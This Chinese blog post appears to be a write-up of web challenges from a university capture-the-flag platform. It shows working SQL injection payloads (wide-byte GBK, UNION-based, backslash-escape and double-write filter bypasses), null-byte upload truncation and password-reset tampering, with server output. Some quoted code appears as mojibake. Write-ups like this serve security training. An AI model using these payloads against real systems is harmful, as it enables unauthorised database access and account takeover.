1. filename=download.jpg
2. uppath=/uploads/dowload.phpdownload.jpg
3. upfilename=path & filename
  • 利用0X00截断(关于截断上传可以参看这篇文章,将download.php后面的download.jpg截断:
    uppath=/uploads/download.phpchr(0)download.jpg
  • nctf{welcome_to_hacks_world}

起名字真难

地址:代码如下

<?php
 function noother_says_correct($number)
{
        $one = ord('1');
        $nine = ord('9');
        for ($i = 0; $i < strlen($number); $i++)
        {   
                $digit = ord($number{$i});
                if ( ($digit >= $one) && ($digit <= $nine) )
                {
                        return false;
                }
        }
           return $number == '54975581388';
}
$flag='*******';
if(noother_says_correct($_GET['key']))
    echo $flag;
else 
    echo 'access denied';
?>
  • 分析:
    1.要使noother_says_correct($_GET['key'])为真
    2.则 $number == '54975581388'成立,返回True
    3.而前面代码又检测$number不能是1-9的数字

  • 利用==特性


  • 54975581388十六进制是ccccccccc
    http://chinalover.sinaapp.com/web12/index.php?key=0xccccccccc
    The flag is:nctf{follow_your_dream}
  • nctf{follow_your_dream}

sql injection 3

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

  • 宽字节注入
  1. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1'
your sql:select id,title from news where id = '1\''
Hello World!OVO
  1. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df'
your sql:select id,title from news where id = '1運''

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in SQL-GBK/index.php on line 10
  1. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=1 -- -
your sql:select id,title from news where id = '1運' and 1=1 -- -'
Hello World!OVO
  1. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 -- -
your sql:select id,title from news where id = '1運' and 1=2 -- -'
  • 很好,可以注入
  1. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' order by 2 -- -
your sql:select id,title from news where id = '1運' order by 2 -- -'
Hello World!OVO
  1. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,2 -- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,2 -- -'
2
  1. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -'
sae-chinalover@220.181.129.119|sae-chinalover|5.5.52-0ubuntu0.14.04.1
  1. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sae-chinalover'-- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=\'sae-chinalover\'-- -'

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in SQL-GBK/index.php on line 10

单引号‘’被转义了

  1. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -

sae-chinalover十六进制是0x7361652d6368696e616c6f766572,用十六进制来绕过字符转义

your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -'
ctf,ctf2,ctf3,ctf4,news
  • 在ctf2中找到flag
  1. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -'
id,content
  1. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(id,content) from ctf2-- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(id,content) from ctf2-- -'
1020no msg in 1020,1021no msg in 1021 too,1022no msg in 1022,1023no msg in 1023~~~,1024the flag is:nctf{query_in_mysql},1025no more
  • nctf{query_in_mysql}
  • 这题好像炸了,看了别人的writeup发现链接不同,考点依然是宽字节注入,nctf{gbk_3sqli}。

密码重置

重置管理员账号:admin 的密码

你在点击忘记密码之后 你的邮箱收到了这么一封重置密码的邮件:

点击此链接重置您的密码

  • http://nctf.nuptzj.cn/web13/index.php?user1=Y3RmdXNlcg==
    Y3RmdXNlcg==是base64加密的ctfuser

  • 修改user=admin,和url的user1=base64(admin)即可


  • nctf{reset_password_often_have_vuln}

sql injection 4

继续注入吧~
题目地址

TIP:反斜杠可以用来转义
仔细查看相关函数的用法

  • 查看源码
<!--
#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';

function clean($str){
    if(get_magic_quotes_gpc()){
        $str=stripslashes($str);
    }
    return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);

$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
    die('Invalid password!');
}

echo $flag;
-->
Invalid password!
  • sql语句
    SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';
    等价于:
    SELECT * FROM users WHERE name=' $username' AND pass='$password';
  • SQL语句单引号类型
    1.添加一个单引号来闭合第一个单引号,因为前面有stripslashes转义了,所以这个方法不行。
    http://chinalover.sinaapp.com/web15/index.php?username=admin' or 1=1 1-- - &password=123
    2.通过\转义将第二个引号省略掉:
    http://chinalover.sinaapp.com/web15/index.php?username=admin&password= or 1=1 -- -
    sql语句变成:
    SELECT * FROM users WHERE name=' admin\' AND pass= ' or 1=1 -- -';
  • 刷新flag出现:flag:nctf{sql_injection_is_interesting}
  • nctf{sql_injection_is_interesting}

你从哪里来

你是从 google 来的吗?
传送门:题目地址

  • 按道理修改referer === "https://www.google.com/就可以,但是好像网站炸了,看了源码确实是这样做。
<?php
$referer = $_SERVER['referer'];
if ($referer === "https://www.google.com/ " || $referer === "https://www.google.com"){
    echo "nctf{http_referer}";
}else{
    echo "are you from google?";
}
?>

AAencode

javascript aaencode

传送门:题目地址

  • 打开链接发现是这样的乱码,不知道怎么回事,不应该啊。
    锞熛夛緹锞�= /锝€锝嵚达級锞� ~鈹烩攣鈹� //*麓鈭囷絸*/ ['_']; o=(锞燂桨锞�) =_=3; c=(锞熚橈緹) =(锞燂桨锞�)-(锞燂桨锞�); (锞熜旓緹) =(锞熚橈緹)= (o^_^o)/ (o^_^o);(锞熜旓緹)={锞熚橈緹: '_' ,锞熛夛緹锞� : ((蠅锞燂緣==3) +'_') [锞熚橈緹] ,锞燂桨锞燂緣 :(锞熛夛緹锞�+ '_')[o^_^o -(锞熚橈緹)] ,锞熜旓緹锞�:((锞燂桨锞�==3) +'_')[锞燂桨锞焆 }; (锞熜旓緹) [锞熚橈緹] =((锞熛夛緹锞�==3) +'_') [c^_^o];(锞熜旓緹) ['c'] = ((锞熜旓緹)+'_') [ (锞燂桨锞�)+(锞燂桨锞�)-(锞熚橈緹) ];(锞熜旓緹) ['o'] = ((锞熜旓緹)+'_') [锞熚橈緹];(锞無锞�)=(锞熜旓緹) ['c']+(锞熜旓緹) ['o']+(锞熛夛緹锞� +'_')[锞熚橈緹]+ ((锞熛夛緹锞�==3) +'_') [锞燂桨锞焆 + ((锞熜旓緹) +'_') [(锞燂桨锞�)+(锞燂桨锞�)]+ ((锞燂桨锞�==3) +'_') [锞熚橈緹]+((锞燂桨锞�==3) +'_') [(锞燂桨锞�) - (锞熚橈緹)]+(锞熜旓緹) ['c']+((锞熜旓緹)+'_') [(锞燂桨锞�)+(锞燂桨锞�)]+ (锞熜旓緹) ['o']+((锞燂桨锞�==3) +'_') [锞熚橈緹];(锞熜旓緹) ['_'] =(o^_^o) [锞無锞焆 [锞無锞焆;(锞熚碉緹)=((锞燂桨锞�==3) +'_') [锞熚橈緹]+ (锞熜旓緹) .锞熜旓緹锞�+((锞熜旓緹)+'_') [(锞燂桨锞�) + (锞燂桨锞�)]+((锞燂桨锞�==3) +'_') [o^_^o -锞熚橈緹]+((锞燂桨锞�==3) +'_') [锞熚橈緹]+ (锞熛夛緹锞� +'_') [锞熚橈緹]; (锞燂桨锞�)+=(锞熚橈緹); (锞熜旓緹)[锞熚碉緹]='\\'; (锞熜旓緹).锞熚橈緹锞�=(锞熜旓緹+ 锞燂桨锞�)[o^_^o -(锞熚橈緹)];(o锞燂桨锞無)=(锞熛夛緹锞� +'_')[c^_^o];(锞熜旓緹) [锞無锞焆='\"';(锞熜旓緹) ['_'] ( (锞熜旓緹) ['_'] (锞熚碉緹+(锞熜旓緹)[锞無锞焆+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (锞熚橈緹)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (锞熚橈緹))+ (锞燂桨锞�)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ ((锞燂桨锞�) + (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ (锞燂桨锞�)+ (锞熜旓緹)[锞熚碉緹]+((锞燂桨锞�) + (锞熚橈緹))+ (c^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞燂桨锞�)+ ((o^_^o) - (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (锞熚橈緹))+ ((o^_^o) +(o^_^o))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (o^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ (锞燂桨锞�)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ ((o^_^o) +(o^_^o))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (o^_^o))+ (o^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (锞熚橈緹))+ ((o^_^o) - (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (锞熚橈緹)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (锞熚橈緹)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (o^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (锞熚橈緹))+ (锞熚橈緹)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ (锞燂桨锞�)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (o^_^o)+ ((锞燂桨锞�) + (o^_^o))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (锞熚橈緹)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (锞熚橈緹)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ ((锞燂桨锞�) + (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (锞熚橈緹))+ ((o^_^o) +(o^_^o))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (o^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (锞熚橈緹))+ ((锞燂桨锞�) + (o^_^o))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (锞燂桨锞�)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ ((锞燂桨锞�) + (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (o^_^o))+ ((锞燂桨锞�) + (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞燂桨锞�)+ ((o^_^o) - (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+((锞燂桨锞�) + (锞熚橈緹))+ (锞熚橈緹)+ (锞熜旓緹)[锞無锞焆) (锞熚橈緹)) ('_');

  • 看了源码,确实不应该这样,这样的AAencode直接在控制台运行就可以。
    ゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (o^_^o)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');

  • nctf{javascript_aaencode}

php 反序列化

http://115.28.150.176/php1/index.php
代码:

<?php
class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];

    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }

    $o = unserialize($pass);

    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else 
            echo "Oh no... You can't fool me";
    }
    else echo "are you trolling?";
}
?>
  • 这题不会哈哈哈,太菜了。

SQL注入2

注入第二题~~主要考察union查询
传送门:点我带你飞

  • Source:
<html>
<head>
Secure Web Login II
</head>
<body>

<?php
if($_POST[user] && $_POST[pass]) {
   mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
      echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
?>


<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>
  • 关键语句:
1.  $pass = md5($_POST[pass]);
2.  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
3.  strcasecmp():如果两者相等,返回 0。
  • 我们可以自己select一个password返回给 $query:
    select pw from ctf where user='$user' and 0=1 union select md5(123) -- -
1. and 0=1使前面的select pw from ctf where user='$user'为假,返回空。
2. 整个语句就返回md5(123)给$query
3. 这样就绕开了查询数据库,直接我们赋值给$query
  • ntcf{union_select_is_wtf}

综合题2

非xss题 但是欢迎留言~
地址:get the flag

  • 点击最下面的本CMS说明:
    http://cms.nuptzj.cn/about.php?file=sm.txt
    显示:
    很明显,这是安装后留下来忘删除的文件。。。 至于链接会出现在主页上,这就要问管理员了。。。 ===============================华丽的分割线============================= 本CMS由Funny公司开发的公司留言板系统,据本技术总监说,此CMS采用国际 顶级的技术所开发,安全性和实用性杠杠滴~</br> 以下是本CMS各文件的功能说明(由于程序猿偷懒,只列了部分文件) config.php:存放数据库信息,移植此CMS时要修改 index.php:主页文件 passencode.php:Funny公司自写密码加密算法库 say.php:用于接收和处理用户留言请求 sm.txt:本CMS的说明文档 sae的information_schema表好像没法检索,我在这里给出admin表结构 create table admin ( id integer, username text, userpass text, ) ======================================================================== 下面是正经的: 本渗透测试平台由:三只小潴(root#zcnhonker.net)& 冷爱(hh250@qq.com)开 发.由你们周老大我辛苦修改,不能题目都被AK嘛,你们说是不是。所以这一题。。你们做出来也算你们吊咯。
  • 看url显然是一个文件包含,那么用来看看about.php的源码吧:
1. 可以用php://filter
2. 这个file参数就是用来查看源码的,可以直接file=about.php查看

about.php源码:

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<?php 
$file=$_GET['file']; 
if($file=="" || strstr($file,'config.php')){
 echo "file参数不能为空!"; 
exit(); 
}
else{ 
$cut=strchr($file,"loginxlcteam");
 if($cut==false){ 
$data=file_get_contents($file); 
$date=htmlspecialchars($data); 
echo $date; 
}
else{ 
echo "<script>alert('敏感目录,禁止查看!但是。。。')
</script>"; } 
}
  • file=loginxlcteam可能是登陆页面
  • 函数解析:
1. strstr() 函数搜索字符串在另一字符串中的第一次出现。如果未找到所搜索的字符串,则返回 FALSE。
2. strchr() 函数是 strstr() 函数的别名。
3. (a): file=config.php或者空,就返回"file参数不能为空!"
   (b): file=loginxlcteam,返回"敏感目录,禁止查看!但是。。。"
  • 结论就是about.php就是一个用来都网页源码的网址。
  • 思路:

1.搜索栏可以SQL注入,拿管理员账号密码
2.getshell

1. SQL注入
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>搜索留言</title> 
</head> 
<body> 
<center> 
<div id="say" name="say" align="left" style="width:1024px"> 
<?php 
if($_SERVER['HTTP_USER_AGENT']!="Xlcteam Browser"){ 
echo '万恶滴黑阔,本功能只有用本公司开发的浏览器才可以用喔~'; 
exit(); 
} 
$id=$_POST['soid']; 
include 'config.php'; 
include 'antiinject.php'; 
include 'antixss.php'; 
$id=antiinject($id); 
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error()); 
mysql_select_db($db_name,$con); 
$id=mysql_real_escape_string($id); 
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
$rs=mysql_fetch_array($result); 
echo htmlspecialchars($rs['nice']).':<br />&nbsp;&nbsp;&nbsp;&nbsp;'.antixss($rs['say']).'<br />';
mysql_free_result($result); 
mysql_free_result($file); 
mysql_close($con); 
?> 
</div> 
</center> 
</body> 
</html>

<?php 
function antiinject($content){ 
$keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","="); 
$info=strtolower($content); 
for($i=0;$i<=count($keyword);$i++){ 
$info=str_replace($keyword[$i], '',$info); 
} 
return $info; } 
?>
  • 绕过blacklist,这里和[AceBear CTF 2018] Web-urlparameter里的$_SERVER["REQUEST_URI"]类型不同:
    1.这里是post方法,Urlparameter是get方法。
    2.这里不能像urlparameter一样直接改url。
  • 采用Insert Double Write绕过,注释符/* */代替空格
  • 注入过程:
1. soid=2/**/oorroorrderder/**/by/**/4
2. soid=1/**/aandnd/**/1>2/**/uunionnion/**/sselectelect/**/1,2,3,4
或:soid=0/**/uunionnion/**/sselectelect/**/1,2,3,4
3. soid=1/**/aandnd/**/1>2/**/uunionnion/**/sselectelect/**/1,concat_ws(0x7c,id,usernnameame,userppassass),3,4/**/ffromrom/**/aadmindmin

得到:1|admin|102 117 99 107 114 117 110 116 117

  • 密码102 117 99 107 114 117 110 116 117ASCII转码为fuckruntu


  • 通过御剑扫到后台登陆页面,发现不对,其实是之前about.php源码有给出login页面:file=loginxlcteam


  • http://cms.nuptzj.cn/loginxlcteam
2. 开始登陆, Getshell

密码重置2

题题被秒,当时我就不乐意了!
本题来源于CUMT
题目链接

TIPS:
1.管理员邮箱观察一下就可以找到
2.linux下一般使用vi编辑器,并且异常退出会留下备份文件
3.弱类型bypass


<pre id="line1"><!DOCTYPE html>  
<html>  <head>  
<meta charset="utf-8" />  
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />  
<meta name="renderer" content="webkit" />  
<meta name="admin" content="admin@nuptzj.cn" />  
<meta name="editor" content="Vim" />  
<title>logic</title>  
<style type="text/css"> body,html{
            position: relative;
            height: 100%;
            width: 100%;
            padding: 0;
            margin: 0;
            background-color: #272822;
            color: #fff;
        }
        form{
            position: absolute;
            top: 50%;
            left: 50%;
            width: 400px;
            margin: -70px -200px;
        }
        form input{
            display: block;
            margin: 10px auto;
            width: 100%;
            border: none;
            height: 2rem;
            border-radius: 5px;
        } </style>  </head>  <body>  
<form action="[submit.php](view-source:http://nctf.nuptzj.cn/web14/submit.php)" method="GET">  
<h1>找回管理员密码</h1> email:<input name="emailAddress" type="text" />
</br> token:<input name="token" type="text" />
</br>  <input type="submit" value="提交">  
</form>  </body>  </html>  </pre>
  • 尝试找到.swp文件:
1.http://nctf.nuptzj.cn/web14/.index.php.swp----Not Found
2.http://nctf.nuptzj.cn/web14/.submit.php.swp---Success


........杩欎竴琛屾槸鐪佺暐鐨勪唬鐮�........

/*
濡傛灉鐧诲綍閭鍦板潃涓嶆槸绠$悊鍛樺垯 die()
鏁版嵁搴撶粨鏋�

--
-- 琛ㄧ殑缁撴瀯 `user`
--

CREATE TABLE IF NOT EXISTS `user` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(255) NOT NULL,
  `email` varchar(255) NOT NULL,
  `token` int(255) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;

--
-- 杞瓨琛ㄤ腑鐨勬暟鎹� `user`
--

INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES
(1, '****涓嶅彲瑙�***', '***涓嶅彲瑙�***', 0);
*/


........杩欎竴琛屾槸鐪佺暐鐨勪唬鐮�........

if(!empty($token)&&!empty($emailAddress)){
    if(strlen($token)!=10) die('fail');
    if($token!='0') die('fail');
    $sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
    $r = mysql_query($sql) or die('db error');
    $r = mysql_fetch_assoc($r);
    $r = $r['num'];
    if($r>0){
        echo $flag;
    }else{
        echo "澶辫触浜嗗憖";
    }
}
  • 关键代码:
if(strlen($token)!=10) die('fail');
    if($token!='0') die('fail');
  • 令token=0000000000,就出来了,考的就是找个.swp文件。
    flag:nctf{thanks_to_cumt_bxs}
  • nctf{thanks_to_cumt_bxs}

注入实战1

请使用firefox浏览器,并安装hackbar插件(自行百度并熟悉)
目标网址:地址
flag为管理员密码的32位md5(小写)
并且加上nctf{}

手注教程群里面发过。
看不懂的话自行百度"mysql手动注入"查阅相关文章

PS:用sqlmap等工具做的就不要厚脸皮提交了

  • 好像完蛋了,参考文章
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 160,165评论 4 364
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,720评论 1 298
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 109,849评论 0 244
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 44,245评论 0 213
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,596评论 3 288
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
